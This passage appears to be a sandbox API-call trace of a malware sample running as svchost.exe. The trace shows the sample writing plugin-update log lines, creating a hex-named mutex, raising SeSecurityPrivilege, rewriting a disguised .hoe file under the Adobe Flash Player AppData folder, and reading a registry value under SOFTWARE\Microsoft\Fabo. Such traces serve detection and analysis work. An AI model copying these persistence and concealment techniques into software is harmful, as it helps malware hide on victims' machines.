lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0122.132] WriteFile (in: hFile=0x2a0, lpBuffer=0x5403790*, nNumberOfBytesToWrite=0xb23, lpNumberOfBytesWritten=0x735f24c, lpOverlapped=0x0 | out: lpBuffer=0x5403790*, lpNumberOfBytesWritten=0x735f24c, lpOverlapped=0x0) returned 1 [0122.138] CloseHandle (hObject=0x2a0) returned 1 [0122.151] ReleaseMutex (hMutex=0x1cc) returned 1 [0122.151] CloseHandle (hObject=0x1cc) returned 1 [0122.151] SetLastError (dwErrCode=0x0) [0122.152] GetLastError () returned 0x0 [0122.152] GetLocalTime (in: lpSystemTime=0x735f630 | out: lpSystemTime=0x735f630*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x18, wMilliseconds=0x23b)) [0122.152] GetCurrentThreadId () returned 0xd70 [0122.152] GetCurrentProcessId () returned 0x2ec [0122.152] wvnsprintfW (in: pszDest=0x54020f0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x735f5d4 | out: pszDest="[13.10.2016 15:43:24] ver=2.2.5, log=0x0016, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: ") returned 86 [0122.152] wvnsprintfW (in: pszDest=0x540219c, cchDest=1962, pszFmt="updateplugin: No plugin url.", arglist=0x735f650 | out: pszDest="updateplugin: No plugin url.") returned 28 [0122.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0016, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", cchWideChar=114, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 114 [0122.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0016, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", cchWideChar=114, lpMultiByteStr=0x5459300, cbMultiByte=115, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0016, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", lpUsedDefaultChar=0x0) returned 114 [0122.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0016, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", cchWideChar=114, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 114 [0122.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0016, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", cchWideChar=114, lpMultiByteStr=0x5459378, cbMultiByte=115, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0016, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", lpUsedDefaultChar=0x0) returned 114 [0122.153] GetSystemTime (in: lpSystemTime=0x735f220 | out: lpSystemTime=0x735f220*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x18, wMilliseconds=0x23b)) [0122.153] SystemTimeToFileTime (in: lpSystemTime=0x735f220, lpFileTime=0x735f210 | out: lpFileTime=0x735f210) returned 1 [0122.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412148, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0122.154] GetUserNameExW () returned 0x1 [0122.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0122.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x54130c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0122.155] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="8A") returned 2 [0122.155] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="00") returned 2 [0122.155] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="00") returned 2 [0122.155] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="00") returned 2 [0122.155] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="B7") returned 2 [0122.155] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="49") returned 2 [0122.155] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="67") returned 2 [0122.156] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="98") returned 2 [0122.156] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="F6") returned 2 [0122.156] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="14") returned 2 [0122.156] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="59") returned 2 [0122.156] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="35") returned 2 [0122.156] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="AA") returned 2 [0122.156] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="3E") returned 2 [0122.156] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="27") returned 2 [0122.156] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="60") returned 2 [0122.156] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1cc [0122.156] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0xffffffff) returned 0x0 [0122.157] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0122.157] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0122.157] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0122.157] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0122.157] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0122.157] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0122.158] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0122.158] GetCurrentThread () returned 0xfffffffe [0122.158] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f26c | out: TokenHandle=0x735f26c*=0x0) returned 0 [0122.158] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f26c | out: TokenHandle=0x735f26c*=0x2a8) returned 1 [0122.158] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f274 | out: lpLuid=0x735f274*(LowPart=0x8, HighPart=0)) returned 1 [0122.159] AdjustTokenPrivileges (in: TokenHandle=0x2a8, DisableAllPrivileges=0, NewState=0x735f270*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.159] GetLastError () returned 0x0 [0122.159] CloseHandle (hObject=0x2a8) returned 1 [0122.159] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0122.160] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214790, lpbSaclPresent=0x735f2a4, pSacl=0x735f298, lpbSaclDefaulted=0x735f2a0 | out: lpbSaclPresent=0x735f2a4, pSacl=0x735f298, lpbSaclDefaulted=0x735f2a0) returned 1 [0122.160] SetNamedSecurityInfoW () returned 0x0 [0122.167] LocalFree (hMem=0x5214790) returned 0x0 [0122.167] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0122.168] GetCurrentThread () returned 0xfffffffe [0122.168] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f26c | out: TokenHandle=0x735f26c*=0x0) returned 0 [0122.168] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f26c | out: TokenHandle=0x735f26c*=0x2a8) returned 1 [0122.168] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f274 | out: lpLuid=0x735f274*(LowPart=0x8, HighPart=0)) returned 1 [0122.169] AdjustTokenPrivileges (in: TokenHandle=0x2a8, DisableAllPrivileges=0, NewState=0x735f270*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.169] GetLastError () returned 0x0 [0122.169] CloseHandle (hObject=0x2a8) returned 1 [0122.169] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0122.169] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214760, lpbSaclPresent=0x735f2a4, pSacl=0x735f298, lpbSaclDefaulted=0x735f2a0 | out: lpbSaclPresent=0x735f2a4, pSacl=0x735f298, lpbSaclDefaulted=0x735f2a0) returned 1 [0122.169] SetNamedSecurityInfoW () returned 0x0 [0122.171] LocalFree (hMem=0x5214760) returned 0x0 [0122.171] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0122.171] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x735f2b8 | out: lpFileSize=0x735f2b8*=2851) returned 1 [0122.172] VirtualAlloc (lpAddress=0x0, dwSize=0xb23, flAllocationType=0x3000, flProtect=0x4) returned 0x5340000 [0122.172] ReadFile (in: hFile=0x2a8, lpBuffer=0x5340000, nNumberOfBytesToRead=0xb23, lpNumberOfBytesRead=0x735f2c4, lpOverlapped=0x0 | out: lpBuffer=0x5340000*, lpNumberOfBytesRead=0x735f2c4*=0xb23, lpOverlapped=0x0) returned 1 [0122.276] CloseHandle (hObject=0x2a8) returned 1 [0122.276] wvnsprintfA (in: pszDest=0x5413cc8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366202") returned 10 [0122.277] wvnsprintfA (in: pszDest=0x5413e28, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.278] wvnsprintfA (in: pszDest=0x5413d88, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.279] wvnsprintfA (in: pszDest=0x5413dc8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.280] wvnsprintfA (in: pszDest=0x5413dc8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.281] wvnsprintfA (in: pszDest=0x5413cc8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.282] wvnsprintfA (in: pszDest=0x5413c48, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.283] wvnsprintfA (in: pszDest=0x5413d08, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.284] wvnsprintfA (in: pszDest=0x5413d68, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.285] wvnsprintfA (in: pszDest=0x5413cc8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.286] wvnsprintfA (in: pszDest=0x5413c48, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.288] wvnsprintfA (in: pszDest=0x5413d28, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.289] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0122.322] WriteFile (in: hFile=0x2d4, lpBuffer=0x5403780*, nNumberOfBytesToWrite=0xc11, lpNumberOfBytesWritten=0x735f2bc, lpOverlapped=0x0 | out: lpBuffer=0x5403780*, lpNumberOfBytesWritten=0x735f2bc, lpOverlapped=0x0) returned 1 [0122.323] CloseHandle (hObject=0x2d4) returned 1 [0122.347] ReleaseMutex (hMutex=0x1cc) returned 1 [0122.347] CloseHandle (hObject=0x1cc) returned 1 [0122.347] SetLastError (dwErrCode=0x0) [0122.347] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x735f11c | out: phkResult=0x735f11c*=0x1cc) returned 0x0 [0122.348] RegQueryValueExW (in: hKey=0x1cc, lpValueName="Vipoug", lpReserved=0x0, lpType=0x735f144, lpData=0x0, lpcbData=0x735f12c*=0x0 | out: lpType=0x735f144*=0x3, lpData=0x0, lpcbData=0x735f12c*=0x220) returned 0x0 [0122.348] RegQueryValueExW (in: hKey=0x1cc, lpValueName="Vipoug", lpReserved=0x0, lpType=0x735f144, lpData=0x54015a8, lpcbData=0x735f12c*=0x220 | out: lpType=0x735f144*=0x3, lpData=0x54015a8*, lpcbData=0x735f12c*=0x220) returned 0x0 [0122.348] RegCloseKey (hKey=0x1cc) returned 0x0 [0122.349] GetLastError () returned 0x0 [0122.349] GetLocalTime (in: lpSystemTime=0x735f628 | out: lpSystemTime=0x735f628*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x18, wMilliseconds=0x2f6)) [0122.349] GetCurrentThreadId () returned 0xd70 [0122.349] GetCurrentProcessId () returned 0x2ec [0122.349] wvnsprintfW (in: pszDest=0x54020f0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x735f5cc | out: pszDest="[13.10.2016 15:43:24] ver=2.2.5, log=0x0017, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: ") returned 86 [0122.349] wvnsprintfW (in: pszDest=0x540219c, cchDest=1962, pszFmt="DynamicUpdate::updateplugin, get etag (%d) = %S", arglist=0x735f648 | out: pszDest="DynamicUpdate::updateplugin, get etag (32) = ") returned 45 [0122.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0017, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (32) = ", cchWideChar=131, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 131 [0122.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0017, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (32) = ", cchWideChar=131, lpMultiByteStr=0x5403100, cbMultiByte=132, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0017, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (32) = ", lpUsedDefaultChar=0x0) returned 131 [0122.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0017, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (32) = ", cchWideChar=131, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 131 [0122.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0017, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (32) = ", cchWideChar=131, lpMultiByteStr=0x5401618, cbMultiByte=132, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0017, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (32) = ", lpUsedDefaultChar=0x0) returned 131 [0122.351] GetSystemTime (in: lpSystemTime=0x735f218 | out: lpSystemTime=0x735f218*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x18, wMilliseconds=0x306)) [0122.351] SystemTimeToFileTime (in: lpSystemTime=0x735f218, lpFileTime=0x735f208 | out: lpFileTime=0x735f208) returned 1 [0122.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412138, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0122.352] GetUserNameExW () returned 0x1 [0122.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0122.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413048, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0122.353] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="8A") returned 2 [0122.353] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="00") returned 2 [0122.353] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="00") returned 2 [0122.353] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="00") returned 2 [0122.353] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="B7") returned 2 [0122.353] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="49") returned 2 [0122.353] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="67") returned 2 [0122.353] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="98") returned 2 [0122.354] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="F6") returned 2 [0122.354] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="14") returned 2 [0122.354] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="59") returned 2 [0122.354] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="35") returned 2 [0122.354] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="AA") returned 2 [0122.354] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="3E") returned 2 [0122.354] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="27") returned 2 [0122.354] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="60") returned 2 [0122.354] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1cc [0122.354] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0xffffffff) returned 0x0 [0122.355] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0122.355] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0122.355] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0122.355] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0122.355] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0122.356] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0122.356] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0122.356] GetCurrentThread () returned 0xfffffffe [0122.356] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f264 | out: TokenHandle=0x735f264*=0x0) returned 0 [0122.356] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f264 | out: TokenHandle=0x735f264*=0x2d4) returned 1 [0122.356] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f26c | out: lpLuid=0x735f26c*(LowPart=0x8, HighPart=0)) returned 1 [0122.357] AdjustTokenPrivileges (in: TokenHandle=0x2d4, DisableAllPrivileges=0, NewState=0x735f268*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.357] GetLastError () returned 0x0 [0122.357] CloseHandle (hObject=0x2d4) returned 1 [0122.357] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0122.358] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214760, lpbSaclPresent=0x735f29c, pSacl=0x735f290, lpbSaclDefaulted=0x735f298 | out: lpbSaclPresent=0x735f29c, pSacl=0x735f290, lpbSaclDefaulted=0x735f298) returned 1 [0122.358] SetNamedSecurityInfoW () returned 0x0 [0122.402] LocalFree (hMem=0x5214760) returned 0x0 [0122.402] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0122.402] GetCurrentThread () returned 0xfffffffe [0122.403] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f264 | out: TokenHandle=0x735f264*=0x0) returned 0 [0122.403] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f264 | out: TokenHandle=0x735f264*=0x2d4) returned 1 [0122.403] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f26c | out: lpLuid=0x735f26c*(LowPart=0x8, HighPart=0)) returned 1 [0122.404] AdjustTokenPrivileges (in: TokenHandle=0x2d4, DisableAllPrivileges=0, NewState=0x735f268*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.404] GetLastError () returned 0x0 [0122.405] CloseHandle (hObject=0x2d4) returned 1 [0122.405] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0122.405] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214700, lpbSaclPresent=0x735f29c, pSacl=0x735f290, lpbSaclDefaulted=0x735f298 | out: lpbSaclPresent=0x735f29c, pSacl=0x735f290, lpbSaclDefaulted=0x735f298) returned 1 [0122.405] SetNamedSecurityInfoW () returned 0x0 [0122.407] LocalFree (hMem=0x5214700) returned 0x0 [0122.407] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0122.408] GetFileSizeEx (in: hFile=0x2d4, 